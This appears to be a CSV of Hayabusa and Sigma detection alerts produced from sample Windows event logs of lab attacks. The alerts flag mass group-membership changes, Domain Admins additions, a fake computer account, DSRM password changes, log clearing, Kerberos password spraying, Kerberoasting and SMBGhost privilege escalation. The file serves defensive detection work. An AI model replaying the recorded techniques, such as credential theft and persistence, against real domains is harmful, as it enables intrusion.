2020-07-12 14:17:23.107 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=lambda-user,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1158  :  Group: Group02",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Member adding to a group by the same account.evtx
2020-07-12 14:17:23.107 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=lambda-user,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1158  :  Group: Group02  :  Subject user: lambda-user  :  Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Member adding to a group by the same account.evtx
2020-07-12 14:19:54.561 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group01",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.561 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group01  :  Subject user: lambda-user  :  Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.564 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group02",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.564 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group02  :  Subject user: lambda-user  :  Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.566 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group03",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.566 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group03  :  Subject user: lambda-user  :  Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.568 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group04",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.568 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group04  :  Subject user: lambda-user  :  Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.570 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group05",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.570 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group05  :  Subject user: lambda-user  :  Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.572 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group06",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.572 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group06  :  Subject user: lambda-user  :  Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.574 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group07",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.574 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group07  :  Subject user: lambda-user  :  Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.576 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group08",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.576 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group08  :  Subject user: lambda-user  :  Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.578 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group09",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.578 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group09  :  Subject user: lambda-user  :  Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.580 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group10",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.580 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group10  :  Subject user: lambda-user  :  Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.582 +09:00,rootdc1.offsec.lan,4728,low,User added to local security group,"User: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group11",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:19:54.582 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=hack-adm-hack,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1150  :  Group: Group11  :  Subject user: lambda-user  :  Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-Massive account group membership change.evtx
2020-07-12 14:27:05.579 +09:00,fs02.offsec.lan,4825,medium,Denied Access To Remote Desktop,,rules/sigma/builtin/security/win_not_allowed_rdp_access.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4825-Denied RDP connection with valid credentials.evtx
2020-07-12 14:28:26.831 +09:00,fs02.offsec.lan,4825,medium,Denied Access To Remote Desktop,,rules/sigma/builtin/security/win_not_allowed_rdp_access.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0008-Lateral Movement/T1021.001-Remote Desktop Protocol/ID4825-Denied RDP connection with valid credentials.evtx
2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,high,User added to local Domain Admins group,"User: CN=honey-pot1,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1159  :  Group: Domain Admins",rules/hayabusa/default/alerts/Security/4732-AccountManipulation_UserAddedToLocalDomainAdminsGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx
2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,high,User added to the global Domain Admins group,"Member added: CN=honey-pot1,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1159  :  Group: Domain Admins  :  Subject user: lambda-user  :  Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalDomainAdmins.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx
2020-07-12 15:01:13.758 +09:00,rootdc1.offsec.lan,4728,medium,User added to global security group,"Member added: CN=honey-pot1,OU=Test-OU,OU=OFFSEC-COMPANY,DC=offsec,DC=lan  :  SID: S-1-5-21-4230534742-2542757381-3142984815-1159  :  Group: Domain Admins  :  Subject user: lambda-user  :  Subject domain: OFFSEC",rules/hayabusa/default/alerts/Security/4728_AccountManipulation_UserAddedToGlobalSecurityGroup.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1098.xxx-Account manipulation/ID4728-4756-Member added to sensitive domain groups.evtx
2020-07-13 04:45:00.670 +09:00,rootdc1.offsec.lan,4720,high,Hidden user account created! (Possible Backdoor),User: FAKE-COMPUTER$  :  SID:S-1-5-21-4230534742-2542757381-3142984815-1168,rules/hayabusa/default/alerts/Security/4720_CreateAccount-LocalAccount_ComputerAccountCreated.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0003-Persistence/T1136-Create account/ID4720-Fake computer account created.evtx
2020-07-13 17:34:33.915 +09:00,rootdc1.offsec.lan,4794,high,Password Change on Directory Service Restore Mode (DSRM) Account,,rules/sigma/builtin/security/win_susp_dsrm_password_change.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1003-Credential dumping/ID4794-4688-DSRM password set with NTDSutil.evtx
2020-07-19 22:06:52.199 +09:00,01566s-win16-ir.threebeesco.com,5145,critical,Protected Storage Service Access,,rules/sigma/builtin/security/win_protected_storage_service_access.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/CA_protectedstorage_5145_rpc_masterkey.evtx
2020-07-23 05:29:27.321 +09:00,01566s-win16-ir.threebeesco.com,1102,high,Security log was cleared,User: a-jbrown,rules/hayabusa/default/alerts/Security/1102_IndicatorRemovalOnHost-ClearWindowsEventLogs_SecurityLogCleared.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: HD01  :  Service: krbtgt/THREEBEESCO.COM  :  IP Address: 172.16.66.1  :  Status: 0x6  :  PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: admin  :  Service: krbtgt/THREEBEESCO.COM  :  IP Address: 172.16.66.1  :  Status: 0x6  :  PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: svc-02  :  Service: krbtgt/THREEBEESCO.COM  :  IP Address: 172.16.66.1  :  Status: 0x6  :  PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: HD02  :  Service: krbtgt/THREEBEESCO.COM  :  IP Address: 172.16.66.1  :  Status: 0x6  :  PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
2020-07-23 05:29:36.414 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: svc-01  :  Service: krbtgt/THREEBEESCO.COM  :  IP Address: 172.16.66.1  :  Status: 0x6  :  PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
2020-07-23 05:29:36.415 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: bob  :  Service: krbtgt/THREEBEESCO.COM  :  IP Address: 172.16.66.1  :  Status: 0x6  :  PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
2020-07-23 05:29:36.415 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: admin02  :  Service: krbtgt/THREEBEESCO.COM  :  IP Address: 172.16.66.1  :  Status: 0x6  :  PreAuthType: -,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
2020-07-23 05:29:36.434 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: normal  :  Service: krbtgt  :  IP Address: 172.16.66.1  :  Status: 0x0  :  PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
2020-07-23 05:29:36.437 +09:00,01566s-win16-ir.threebeesco.com,4768,informational,Kerberos TGT was requested,User: normal  :  Service: krbtgt  :  IP Address: ::ffff:172.16.66.1  :  Status: 0x0  :  PreAuthType: 2,rules/hayabusa/default/events/Security/Logons/4768_KerberosTGT-Request.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Credential Access/kerberos_pwd_spray_4771.evtx
2020-07-27 07:26:14.523 +09:00,MSEDGEWIN10,1,informational,Process Creation,Command: cmd  :  Path: C:\Windows\System32\cmd.exe  :  User: NT AUTHORITY\SYSTEM  :  Parent Command: winlogon.exe,rules/hayabusa/sysmon/events/1_ProcessCreation.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx
2020-07-27 07:26:14.523 +09:00,MSEDGEWIN10,1,high,Abused Debug Privilege by Arbitrary Parent Processes,,rules/sigma/process_creation/sysmon_abusing_debug_privilege.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx
2020-07-27 07:26:15.141 +09:00,MSEDGEWIN10,3,low,PowerShell Network Connections,,rules/sigma/network_connection/sysmon_powershell_network_connection.yml,../hayabusa-sample-evtx/EVTX-ATTACK-SAMPLES/Privilege Escalation/CVE-2020-0796_SMBV3Ghost_LocalPrivEsc_Sysmon_3_1_10.evtx
2020-08-02 20:21:46.062 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
2020-08-02 20:21:46.068 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
2020-08-02 20:21:46.078 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
2020-08-02 20:21:46.083 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
2020-08-02 20:21:46.088 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
2020-08-02 20:21:46.094 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
2020-08-02 20:21:46.100 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
2020-08-02 20:21:46.110 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
2020-08-02 20:21:46.117 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
2020-08-02 20:21:46.153 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
2020-08-02 20:21:46.166 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
2020-08-02 20:21:46.181 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
2020-08-02 20:21:46.181 +09:00,rootdc1.offsec.lan,4662,medium,AD User Enumeration,,rules/sigma/builtin/security/win_ad_user_enumeration.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1555-Credentials from Password Stores/ID4662-Sensitve DPAPI attributes accessed.evtx
2020-08-02 20:33:06.521 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User:   :  Service:   :  IP Address: ::ffff:10.23.23.9  :  Status: 0x25,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
2020-08-02 20:33:06.523 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: admmig@OFFSEC.LAN  :  Service: Svc-SQL-DB01  :  IP Address: ::ffff:10.23.23.9  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
2020-08-02 20:33:06.523 +09:00,rootdc1.offsec.lan,4769,medium,Suspicious Kerberos RC4 Ticket Encryption,,rules/sigma/builtin/security/win_susp_rc4_kerberos.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
2020-08-02 20:37:11.847 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN  :  Service: ROOTDC1$  :  IP Address: ::1  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
2020-08-02 20:37:12.567 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: ROOTDC1$@OFFSEC.LAN  :  Service: ROOTDC1$  :  IP Address: ::1  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
2020-08-02 20:37:54.898 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN  :  Service: ROOTDC1$  :  IP Address: ::ffff:10.23.42.22  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
2020-08-02 20:37:54.999 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN  :  Service: WEC01$  :  IP Address: ::ffff:10.23.42.22  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
2020-08-02 20:37:55.142 +09:00,rootdc1.offsec.lan,4769,informational,Kerberos Service Ticket Requested,User: WEC01$@OFFSEC.LAN  :  Service: ROOTDC2$  :  IP Address: ::ffff:10.23.42.22  :  Status: 0x0,rules/hayabusa/default/events/Security/Logons/4769_KerberosServiceTicketRequest.yml,../hayabusa-sample-evtx/EVTX-to-MITRE-Attack/TA0006-Credential Access/T1558-Steal or Forge Kerberos Tickets/ID4769-Kerberoast ticket with low encryption.evtx
